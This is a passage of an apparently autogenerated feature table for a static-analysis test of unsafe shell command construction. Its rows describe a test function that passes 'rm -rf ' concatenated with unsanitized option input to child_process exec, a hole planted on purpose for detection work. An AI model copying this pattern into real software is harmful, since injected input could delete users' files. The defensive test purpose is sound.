name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:22 | opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:22 | opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:22 | opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:22 | opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:26 | opts.bla | assignedToPropName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:26 | opts.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:26 | opts.bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:26 | opts.bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:26 | opts.bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:19:279:26 | opts.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:24:279:26 | bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:24:279:26 | bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:24:279:26 | bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:24:279:26 | bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:279:24:279:26 | bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:4 | cp | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:4 | cp | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:4 | cp | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:9 | cp.exec | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:9 | cp.exec | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:9 | cp.exec | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | exceptional return of cp.exec ... ts.bla) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | exceptional return of cp.exec ... ts.bla) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | exceptional return of cp.exec ... ts.bla) | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | exceptional return of cp.exec ... ts.bla) | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | exceptional return of cp.exec ... ts.bla) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:6:281:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:6:281:9 | exec | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:6:281:9 | exec | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:6:281:9 | exec | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:6:281:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:19 | "rm -rf " | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:19 | "rm -rf " | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:19 | "rm -rf " | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:19 | "rm -rf " | stringConcatenatedWith | -endpoint- this.opts.bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:26 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:26 | this | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:26 | this | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:26 | this | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:26 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:31 | this.opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:31 | this.opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:31 | this.opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:31 | this.opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:31 | this.opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:35 | this.opts.bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:35 | this.opts.bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:35 | this.opts.bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:35 | this.opts.bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:35 | this.opts.bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:23:281:35 | this.opts.bla | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:28:281:31 | opts | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:28:281:31 | opts | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:28:281:31 | opts | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:28:281:31 | opts | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:28:281:31 | opts | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:33:281:35 | bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 